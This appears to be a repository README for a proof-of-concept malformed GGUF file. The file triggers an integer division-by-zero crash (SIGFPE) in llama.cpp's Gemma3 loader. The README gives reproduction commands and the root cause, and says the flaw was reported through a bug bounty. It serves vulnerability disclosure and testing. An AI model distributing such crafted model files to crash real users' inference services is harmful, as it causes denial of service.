salvepilo's picture
Add README
2ce58b4 verified
|
Raw
History Blame Contribute Delete
1.03 kB
---
license: mit
tags:
- security
- llama.cpp
- gguf
- poc
---
# llama.cpp Gemma3 Integer Division-by-Zero PoC
Proof-of-concept for a division-by-zero vulnerability in llama.cpp's Gemma3 architecture loader.
**Vulnerable file:** `src/models/gemma3.cpp:32`
## Files
- `poc_gemma3_divzero.gguf` — 235-byte malicious GGUF (no tensors, triggers SIGFPE on x86_64)
- `reproducer.cpp` — standalone C++ reproducer (no llama.cpp build needed)
## Quick test
```bash
# Standalone (no llama.cpp needed)
g++ -o reproducer reproducer.cpp -fsanitize=undefined -fno-sanitize-recover=all
./reproducer
# Expected: runtime error: division by zero
# With llama.cpp
./llama-cli -m poc_gemma3_divzero.gguf -p 'hello'
# Expected on x86_64: Floating point exception (exit 136)
```
## Root cause
When `block_count=62` (→ `LLM_TYPE_27B`) and `attention.head_count` is absent from the GGUF,
`n_head(0)` returns 0 and the expression `n_embd / n_head(0)` is integer division-by-zero.
Reported via [Huntr](https://huntr.com) bug bounty program.